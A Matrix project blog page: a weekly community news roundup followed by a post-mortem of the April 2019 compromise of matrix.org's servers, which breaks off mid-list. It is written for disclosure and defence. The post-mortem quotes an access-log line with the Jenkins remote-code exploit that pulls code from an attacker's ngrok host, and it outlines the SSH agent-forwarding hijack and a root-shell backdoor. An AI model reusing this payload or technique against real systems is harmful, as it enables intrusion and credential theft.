This Week in Matrix 2019-05-10

10.05.2019 00:00 — This Week in MatrixBen Parsons

Matrix Live

This week Neil and Matthew are talking about recent security issues - this is a really long and detailed chat, but you can skip to around the 32 minute mark to hear about other news - including progress on reactions. Reminder that for a good "big picture" overview of the progress of Matrix, you can look at the Homeserver High Level Roadmap.

Dept of Servers

Synapse

Neil, Synapse-dev wrangler:

Reactions continues at full speed, we have a draft PR and will be implementing over the coming week. The ability to blacklist IPs over federation will land imminently, as well as a nasty device management bug that led to a spate of E2E errors. Next week is all about Reactions, resuming work on the small homeserver project and finally getting back to Synapse 1.0 blockers following all the remediation drama of the past few weeks. With any luck we’ll have a new Synapse release for you next week.

Dept of Encryption

Pantalaimon

Says poljar:

  • Pantalaimon received a configuration file. The configuration file adds the ability to configure multiple Homeservers and pantalaimon will run having each Homeserver exposed on a different TCP port.
  • The panctl utility has received support for more commands, it now has the ability to accept SAS requests, confirm them, import/export keys, list pan users as well as list devices of users. Completions for the commands were also added.

Dept of Clients

Pattle - big update!

Wilko announced:

A new version of Pattle is available on F-droid!

Lots of changes again, including:

  • Render HTML formatting in messages!
  • Replies are now rendered!
  • Show date headers between messages of different days!
  • Render usernames with a color in chat timeline
  • Add loading indicators (when logging in, loading chats, etc.)
  • Show error banner at the top if syncing failed
  • Syncing now resumes after a failed attempt (no more restarting)
  • Fix messages not being sent if connection was lost and the app restarted

To install Pattle, add the following repo in F-droid:

https://fdroid.pattle.im/?fingerprint=E91F63CA6AE04F8E7EA53E52242EAF8779559209B8A342F152F9E7265E3EA729

Follow development here and in #pattle:matrix.org!

Fractal

Alexandre Franke:

Although the development pace has been reduced lately, the Fractal team managed to make significant progress towards the 4.2 release. More specifically since our previous news, Chris has landed much of his adaptive view work to get Fractal in a mobile friendly state so it’s ready to run on the Librem 5 once Purism starts shipping them. But he didn’t stop there: eager to see his awesome work in the hands of many people (figuratively, the literal application will have to wait for the phone to be out 😛) as soon as possible, he tackled a few bugs that we really wanted to get sorted out before we got a new version out.

Alexandre also prepared the changelog with a bird’s-eye view of all changes that happened since 4.0.

Last but not least, we had a few external contributions for features such as network proxy support and typing notifications.

Riot Web

Progress on message composer for editing messages.

Riot iOS

  • 0.8.6 has been released on Tuesday
  • We are working on reactions

Riot Android

  • We have fixed some minor bugs, our efforts are now on RiotX
  • New FDroid mode support for high service level, regardless of battery usage.

RiotX (Android)

  • Benoit has started to implement the crypto on RiotX. Basically all the legacy has been imported and a migration to the new architecture is done. Lots of plumbing and rework, but it should be the fastest way to support crypto on RiotX.
  • Valere is working on the emoji picker and reactions, and has also added some actions on events (copy, share, view source, etc.)
  • François has added room invitation support. It will be possible soon to see invitations, and accept or reject them.

continuum

yuforia has news on continuum, a JavaFX-based client.

this week in continuum

  • right-click on a room in the room list to send invitations
  • experimental support for receiving invitations
  • membership data are now also persisted in database

FluffyChat available as a Snap package, plus E2EE progress

Krille announced FluffyChat for Linux desktops:

FluffyChat is now also available as a Snap package for desktop Linux
https://snapcraft.io/fluffychat :D
It's a Matrix client written in Qml for Ubuntu Phones. Now it is working for Linux Desktop too.

He also has news to share re E2E:

Progress has been made at the end2end encryption for FluffyChat. Qml bindings for the libolm library are mostly ready and the app can now create keys and upload keys to the server. Device tracking is now implemented too.

E2E when? SOON! See the branch here: https://gitlab.com/ChristianPauly/fluffychat/tree/e2eencryption

Dept of Bridges

New Hangouts bridge from tulir / mautrix

tulir has been using his mautrix-python lib, which was recently used to enable his mautrix-facebook bridge, to bring a new method for Matrix-Hangouts bridging:

New bridge again, this time it's Hangouts: https://github.com/tulir/mautrix-hangouts / #hangouts:maunium.net. As with the Messenger bridge, currently the main difference to matrix-puppet-hangouts is multi-user support (also no hacky JS/Python mixing).

Before making mautrix-hangouts, I put a bunch of the generic bridging parts of mautrix-facebook into mautrix-python's bridge module and used that in both bridges. After Debian 10 is released, I'll drop Python 3.5 compatibility in mautrix-telegram and move it to use mautrix-python and the bridge module too.

Next week I'm planning on adding a bunch of features to both my new bridges, such as bridging formatting and remaining media types (so no new bridges planned for now :D).

Dept of SDKs and Frameworks

QMatrixClient is now "Quotient"

kitsune:

The vote on a new name for the QMatrixClient project has been going on over the past week.
We have a winner now, and the new name is "Quotient"! In the nearest weeks, expect changes in the library code (it's going to be libQuotient from the next release), room aliases (already ongoing), links to the repos etc. etc. Where possible, we're going to smoothen the migration path by providing legacy fallbacks (e.g., the new C++ namespace, Quotient, will be introduced but the old one, QMatrixClient, will stay its synonym, although deprecated).
Just in case you missed all the previous mentions of the topic - it's only related to the overall project and the library, but not the client - its name remains Quaternion.

Why rename?

Because the previous name has been a bit clumsy and, most importantly, the project is no more focusing just on client-side but on a wider set of applications of Matrix (no homeserver in plans though). See also the recent backlog of #qmatrixclient:matrix.org (now also #quotient:matrix.org) earlier this week for the whole discussion

Ruby Matrix SDK hits v0.1.0

Ananace:

Just published version 0.1.0 of the Ruby Matrix SDK, and I've gotten enough testing written now where I feel comfortable not marking this as a pre-production release. So feel free to integrate it into more than just prototypes and experiments. 😃
Relevant links; GitHub page, #ruby-matrix-sdk:kittenface.studio.

Opsdroid big updates, with focus on Matrix

Cadair:

Opsdroid 0.15 has been released, with a lot of matrix focused updates. The biggest of which is support for sending and receiving images and files. There have also been a bunch of bug fixes such as clean exit of the matrix connector and correct handling of events which are not parsed. There are also a bunch of other not matrix specific changes like support for the awesome parse library for string matching. Read all about it in the release blog: https://medium.com/opsdroid/event-dispatching-simple-parsing-and-more-in-v0-15-3f721b8a6d6c

PK interfaces for ruby_olm

Willem:

This week I've been adding PK interfaces to cjhdev's Ruby bindings for Olm, in preparation of improving my Tchap proxy. The PK interfaces can be found in my fork of ruby_olm. Building the native extensions for the gem has had a major overhaul, so no pull request yet.

Dept of Ops

matrix-docker-ansible-deploy update

It's been a few weeks since we heard from Slavi about matrix-docker-ansible-deploy, but he's been working away on it:

We haven't shared any matrix-docker-ansible-deploy updates lately, but we've had lots of community contributions.

Most of it has been bug fixes and various internal improvements, but we've also landed a few large features. Here's what's most interesting lately:

Dept of Status of Matrix

jaywink, maintainer of https://the-federation.info, told us what we all know to be true: Matrix is great and is getting more popular:

Matrix (Synapse) jumps to second place in https://the-federation.info site, which lists servers of the federated social web. Help us map the true size of the Matrixverse by adding your server by going a https://the-federation.info/register/yourdomain.tld. Note, SRV and well-known lookups not yet working, so registration needs to happen with the Matrix server real domain (and port if any).

That's all I know

See you next week, and be sure to stop by #twim:matrix.org with your updates!

PS to people who would normally be reading this in their own RSS reader - I apologise, we'll get the full-article feed back up soon.

Post-mortem and remediations for Apr 11 security incident

08.05.2019 00:00 — General, SecurityMatthew Hodgson

Table of contents

Introduction

Hi all,

On April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver - specifically: removing an attacker who had gained superuser access to much of our production network. We provided updates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full analysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has taken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and we also wanted to get the key remediation work in place before writing up the post-mortem.

Firstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix network - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. If you see someone say “Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got compromised via a Jenkins vulnerability and bad ops practices, but the protocol and network itself was not impacted. This is not to say that the Matrix protocol itself is bug free - indeed we are still in the process of exiting beta (delayed by this incident), but this incident was not related to the protocol.

Before we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an altruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised communication protocol and network for the benefit of everyone; giving users total control back over how they communicate online.

In this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time around the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help bootstrap the Matrix ecosystem, and we paid the price.

This post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and indeed intend to come out of this episode stronger than you can possibly imagine :)

Meanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will this make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE compatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. The funding we raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches - for which we need your support.

Finally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them responsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.

History

Firstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services runs across roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots, integrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the network and make life easier for first-time users.

The deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our previous datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the well-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as possible, and so we span up a bunch of vanilla Debian boxes on UpCloud, and shifted over services as simply as we could. We had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams putting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server running and trying to actually develop and improve Matrix itself.

In practice, this meant that some corners were cut that we expected to be able to come back to and address once we had dedicated ops staff on the team. For instance, we skipped setting up a VPN for accessing production in favour of simply SSHing into the servers over the internet. We also went for the simplest possible config management system: checking all the configs for the services into a private git repo. We also didn’t spend much time hardening the default Debian installations - for instance, the default image allows root access via SSH and allows SSH agent forwarding, and the config wasn’t tweaked. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these things right - but the attitude was that because we’d got this right in the past, we’d be easily able to get it right in future once we fixed up the hosts with proper configuration management etc.

Separately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately, despite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS project, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly visible to all contributors - whether they are part of the core dev team or not. So we put Jenkins on its own host, gave it some macOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.

Lots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began talking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta and to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked up more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by shielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).

Good news was that funding meant that in March 2018 we were able to hire a fulltime ops specialist! By this point, however, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the startup formed in 2017 to hire the core team. Firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider, and secondly, to support France in rolling out their massive Matrix deployment as a flagship example how Matrix can be used. And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy datacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im and France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the Matrix.org server entirely, once we have account portability).

So we ended up with two production environments; the legacy Matrix.org infra, whose shortcomings continued to linger and fester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the legacy datacenter; whose configuration is managed exclusively by Ansible, and have sensible SSH configs which disallow root login etc. With 20:20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of the normalisation of deviance - we had gotten too used to the bad practices; all our attention was going elsewhere; and so we simply failed to prioritise getting back to fix them.

The Incident

The first evidence of things going wrong was a tweet from JaikeySarraf, a security researcher who kindly reached out via DM at the end of Apr 9th to warn us that our Jenkins was outdated after stumbling across it via Google. In practice, our Jenkins was running version 2.117 with plugins which had been updated on an adhoc basis, and we had indeed missed the security advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), and so on Apr 10th we updated the Jenkins and investigated to see if any vulnerabilities had been exploited.

In this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2 on the Jenkins build server. This was suspicious both due to the key not being in our key DB and the fact the key was stored in the obscure authorized_keys2 file (a legacy location from back when OpenSSH transitioned from SSH1->SSH2). Further inspection showed that 19 hosts in total had the same key present in the same place.

At this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking snapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their tracks. Findings were:

matrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%0A@Grab(group=%27tw.orange%27,%20module=%270x3a%27,%20version=%27000%27)%0Aimport%20Orange; HTTP/1.1" 500 6083 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"

  • This allowed them to further compromise a Jenkins slave (Flywheel, an old Mac Pro used mainly for continuous integration testing of Riot/iOS and Riot/Android). The attacker put an SSH key on the box, which was unfortunately exposed to the internet via a high-numbered SSH port for ease of admin by remote users, and placed a trap which waited for any user to SSH into the jenkins user, which would then hijack any available forwarded SSH keys to try to add the attacker’s SSH key to root@ on as many other hosts as possible.
  • On Apr 4th at 12:32 GMT, one of the Riot devops team members SSH’d into the Jenkins slave to perform some admin, forwarding their SSH key for convenience for accessing other boxes while doing so. This triggered the trap, and resulted in the majority of the malicious keys being inserted to the remote hosts.
  • From this point on, the attacker proceeded to explore the network, performing targeted exfiltration of data (e.g. our passbolt database, which is thankfully end-to-end encrypted via GPG) seemingly targeting credentials and data for use in onward exploits, and installing backdoors for later use (e.g. a setuid root shell at /usr/share/bsd-mail/shroot).
  • The majority of access to the hosts occurred between Apr 4th and 6th.
  • There was no evidence of large-scale data exfiltration, based on analysing network logs.
  • There was no evidence of Modular.im hosts having been compromised. (Modular’s provisioning system and DB did run on the old infrastructure, but it was not used to tamper with the modular instances themselves).
  • There was no evidence of the identity server databases having been compromised.
  • There was no evidence of tampering in our source code repositories.
  • There was no evidence of tampering of our distributed software packages.
  • Two more hosts were compromised on Apr 5th by similarly hijacking another developer SSH agent as the dev logged into a production server.

By around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at evicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.

We then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action when an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old hosts entirely (including ones which appeared to not have been compromised, for safety), spinning up entirely new hosts, and redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with unplanned maintenance and provisioning issues in the datacenter provider and unexpected delays spent waiting to copy data volumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a website up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated WordPress content from the old website. We opted not to transition any WordPress deployments to the new infra, in a bid to keep our attack surface as small as possible going forwards).

Given the production database had been accessed, we had no choice but drop all access_tokens for matrix.org, to stop the attacker accessing user accounts, causing a forced logout for all users on the server. We also recommended all users change their passwords, given the salted & hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.

At about 4am we had enough of the bare necessities back up and running to pause for sleep.

The Defacement

At around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a defacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being transparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including the production database and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to get on our radar as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t back up (we now have emergency-emergency-paging for this eventuality).

On inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint the DNS for matrix.org to a defacement site hosted on Github. Now, as part of rotating the secrets which had been compromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes to our DNS) during the rebuild on Apr 11. When you log into Cloudflare, it looks something like this...

Cloudflare login UI

...where the top account is your personal one, and the bottom one is an admin role account. To rotate the admin API key, we clicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the Change API Key button.

Unfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As a result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.

To flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the right place, and continued on with the rebuild.

The Rebuild

The goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good security practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure the new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that made the breach possible were mitigated:

  • Access via SSH restricted as heavily as possible
  • SSH agent forwarding disabled server-side
  • All configuration to be managed by Ansible, with secrets encrypted in vaults, rather than sitting in a git repo.

Then, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing with securer alternatives if needed, even if it slowed down the rebuild. Particularly, this meant:

  • Jenkins has been replaced by Buildkite
  • Wordpress has been replaced by static generated sites (e.g. Gatsby)
  • cgit has been replaced by gitlab.
  • Entirely new packaging building, signing & distribution infrastructure (more on that later)
  • etc.

Now, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load balancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the infra - which is why it is taking a while to get full parity with where we were before.

In the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing service list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:

Service status

Apologies again that it took longer to get some of these services back up than we’d preferred (and that there are still a few pending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work, other security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored securely.

Remediations

Once the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the whole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.

We’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking, and in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the items, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we don’t want to dig into areas where remediation work is still ongoing. We will aim to provide an update on these once ongoing work is complete, however.

We should also acknowledge that after being removed from the infra, the attacker chose to file a set of Github issues on Apr 12 to highlight some of the security issues that had taken advantage of during the breach. Their actions matched the findings from our forensics on Apr 10, and their suggested remediations aligned with our plan.

We’ve split the remediation work into the following domains.

SSH

Some of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:

SSH agent forwarding should be disabled.

SSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH keys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are to make it easy to copy files between remote servers via scp or rsync, or to interact with a SCM system such as Github via SSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it, letting the server impersonate you.

The common wisdom on this tends to be something like: “Only use agent forwarding when connecting to trusted hosts”. For instance, Github’s guide to using SSH agent forwarding says:

Warning: You may be tempted to use a wildcard like Host * to just apply this setting (ForwardAgent: yes) to all SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you SSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection is established. You should only add servers you trust and that you intend to use with agent forwarding

As a result, several of the team doing ops work had set Host *.matrix.org ForwardAgent: yes in their ssh client configs, thinking “well, what can we trust if not our own servers?”

This was a massive, massive mistake.

If there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in general you should never use it. Not only can malicious code running on the server as that user (or root) hijack your credentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be inaccessible. All it takes is someone to have snuck malicious code on your server waiting for you to log in with a forwarded agent, and boom, even if it was just a one-off ssh -A.

Our remediations for this are:

  • Disable all ssh agent forwarding on the servers.
  • If you need to jump through a box to ssh into another box, use ssh -J $host.
  • This can also be used with rsync via rsync -e "ssh -J $host"
  • If you need to copy files between machines, use rsync rather than scp (OpenSSH 8.0’s release notes explicitly recommends using more modern protocols than scp).
  • If you need to regularly copy stuff from server to another (or use SSH to GitHub to check out something from a private repo), it might be better to have a specific SSH ‘deploy key’ created for this, stored server-side and only able to perform limited actions.
  • If you just need to check out stuff from public git repos, use https rather than git+ssh.
  • Try to educate everyone on the perils of SSH agent forwarding: if our past selves can’t be a good example, they can at least be a horrible warning...

Another approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to access your keys. However, not all agents support this (OpenSSH’s does via ssh-add -c, but gnome-keyring for instance doesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.

SSH should not be exposed to the general internet

Needless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main access to dev network, and then SSH bastion hosts to be the only access point into production, using SSH keys to restrict access to be as minimal as possible.

SSH keys should give minimal access

Another major problem factor was that individual SSH keys gave very broad access. We have gone through ensuring that SSH keys grant the least privilege required to the users in question. Particularly, root login should not be available over SSH.

A typical scenario where users might end up with unnecessary access to production are developers who simply want to push new code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure everywhere rather than developers having to actually SSH into production. For instance, the new matrix.org blog is continuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs should be available to developers from a logserver in real time, without having to SSH into the actual production host. We’ve already been experimenting internally with sentry for this.

Relatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access), to have finer grained granularity over locking down their permissions and revoking them etc. (We had actually already started this process, and while it didn’t help prevent the attack, it did assist with forensics).

Two factor authentication

We are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding hijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.

It should be made as hard as possible to add malicious SSH keys

We’ve decided to stop users from being able to directly manage their own SSH keys in production via ~/.ssh/authorized_keys (or ~/.ssh/authorized_keys2 for that matter) - we can see no benefit from letting non-root users set keys.

Instead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account (using sshd’s AuthorizedKeysFile /etc/ssh/authorized_keys/%u directive).

Changes to SSH keys should be carefully monitored

If we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are doing this by managing the keys exclusively via Ansible, and also improving our intrusion detection in general.

Similarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).

SSH config should be hardened, disabling unnecessary options

If we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught several of these failure modes at the outset. We’ve now done so (as per above).

We’d like to recommend that packages of openssh start having secure-by-default configurations, as a number of the old options just don’t need to exist on most newly provisioned machines.

Network architecture

As mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a core network or a good split between different production environments.

We are addressing this by:

  • Splitting our infrastructure into strictly separated service domains, which are firewalled from each other and can only access each other via their respective ‘front doors’ (e.g. HTTPS APIs exposed at the loadbalancers).
    • Development
    • Intranet
    • Package Build (airgapped; see below for more details)
    • Package Distribution
    • Production, which is in turn split per class of service.
  • Access to these networks will be via VPN + SSH jumpboxes (as per above). Access to the VPN is via per-device certificate + 2FA, and SSH via keys as per above.
  • Switching to an improved internal VPN between hosts within a given network environment (i.e. we don’t trust the datacenter LAN).

We’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix processes, VMs, and occasional containers), providing an additional level of namespace isolation.

Keeping patched

Needless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although there would of course still have been scope for a 0-day attack).

Going forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting security advisories on an ad hoc basis. We are now also setting up regular vulnerability scans against production so we catch any gaps before attackers do.

Aside from our infrastructure, we’re also extending the process of regularly checking for security updates to also checking for outdated dependencies in our distributed software (Riot, Synapse, etc) too, given the discipline to regularly chase outdated software applies equally to both.

Moving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.

Intrusion detection

There’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies, we’re working on real-time log analysis for aberrant behaviour.

Incident management

There is much we have learnt from managing an incident at this scale. The main highlights taken from our internal retrospective are:

  • The need for a single incident manager to coordinate the technical response and coordinate prioritisation and handover between those handling the incident. (We lacked a single incident manager at first, given several of the team started off that week on holiday...)
  • The benefits of gathering all relevant info and checklists onto a canonical set of shared documents rather than being spread across different chatrooms and lost in scrollback.
  • The need to have an existing inventory of services and secrets available for tracking progress and prioritisation
  • The need to have a general incident management checklist for future reference, which folks can familiarise themselves with ahead of time to avoid stuff getting forgotten. The sort of stuff which will go on our checklist in future includes:
    • Remembering to appoint named incident manager, external comms manager & internal comms manager. (They could of course be the same person, but the roles are distinct).
    • Defining a sensible sequence of forensics, mitigations, communication, rotating secrets etc is followed rather than having to work it out on the fly and risk forgetting stuff
    • Remembering to informing the ICO (Information Commissioner Office) of any user data breaches
    • Guidelines on how to balance between forensics and rebuilding (i.e. how long to spend on forensics, if at all, before pulling the plug)
    • Reminders to snapshot systems for forensics & backups
    • Reminder to not redesign infrastructure during a rebuild. There were a few instances where we lost time by seizing the opportunity to try to fix design flaws whilst rebuilding, some of which were avoidable.
    • Making sure that communication isn’t sent prematurely to users (e.g. we posted the blog post asking people to update their passwords before password reset had actually been restored - apologies for that.)

Configuration management

One of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most accounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the checkout to wherever the app or OS needed it.

This is bad in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in terms of being able to automatically maintain configuration and spot unauthorised configuration changes.

Our solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established for Modular.im), using Ansible vaults to store the encrypted secrets. It’s unfortunate that we had already done the work for this (and even had been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.

Avoiding temporary measures which last forever

None of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in 2017. As a general point, we should try and do it right the first time - and failing that, assign responsibility to someone to update it and assign responsibility to someone else to check. In other words, the only way to dig out of temporary measures like this is to project manage the update or it will not happen. This is of course a general point not specific to this incident, but one well worth reiterating.

Secure packaging

One of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository, Riot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised during the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience of a near-automated release process without thinking through the security risks of storing keys on a production server.

Whilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the project has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and somehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised signing key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and download counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this setback, feel free to give it some stars on the Play Store). We also revoked the compromised Synapse & Riot GPG keys and created new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).

In terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What we have landed on is as follows:

  • Developers create a release branch to signify a new release (ensuring dependencies are pinned to known good versions).
  • We then perform all releases from a dedicated isolated release terminal.
    • This is a device which is kept disconnected from the internet, other than when doing a release, and even then it is firewalled to be able to pull data from SCM and push to the package distribution servers, but otherwise entirely isolated from the network.
    • Needless to say, the device is strictly used for nothing other than performing releases.
    • The build environment installation is scripted and installs on a fresh OS image (letting us easily build new release terminals as needed)
    • The signing keys (hardware or software) are kept exclusively on this device.
    • The publishing SSH keys (hardware or software) used to push to the packaging servers are kept exclusively on this device.
    • We physically store the device securely.
    • We ensure someone on the team always has physical access to it in order to do emergency builds.
  • Meanwhile, releases are distributed using dedicated infrastructure, entirely isolated from the rest of production.
    • These live at https://packages.matrix.org and https://packages.riot.im
    • These are minimal machines with nothing but a static web-server.
    • They are accessed only via the dedicated SSH keys stored on the release terminal.
    • These in turn can be mirrored in future to avoid a SPOF (or we could cheat and use Cloudflare’s always online feature, for better or worse).

Alternatives here included:

  • In an ideal world we’d do reproducible builds instead, and sign the build’s hash with a hardware key, but given we don’t have reproducible builds yet this will have to suffice for now.
  • We could delegate building and distribution entirely to a 3rd party setup such as OBS (as per https://github.com/matrix-org/matrix.org/issues/370). However, we have a very wide range of artefacts to build across many different platforms and OSes, so would rather build ourselves if we can.

Dev and CI infrastructure

The main change in our dev and CI infrastructure is to move from Jenkins to Buildkite. The latter has been serving us well for Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was providing. Buildkite works by orchestrating jobs on a elastic pool of CI workers we host in our own AWS, and so far has done so quite painlessly.

The new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g. riot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than pushing the artefact via SSH to production.

Other than CI, our strategy is:

  • Continue using Github for public repositories
  • Use gitlab.matrix.org for private repositories (and stuff which we don’t want to re-export via the US, like Olm)
  • Continue to host docker images on Docker Hub (despite their recent security dramas).

Log minimisation and handling Personally Identifying Information (PII)

Another thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker going spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on matrix.org relatively verbose to help with debugging. There’s nothing more frustrating than trying to trace through the traffic for a bug only to discover that logging didn’t pick it up.

However, we can still improve our logging and PII-handling substantially:

  • Ensuring that wherever possible, we hash or at least truncate any PII before logging it (access tokens, matrix IDs, 3rd party IDs etc).
  • Minimising log retention to the bare minimum we need to investigate recent issues and abuse
  • Ensuring that PII is stored hashed wherever possible.

Meanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but there is also more we can do, particularly:

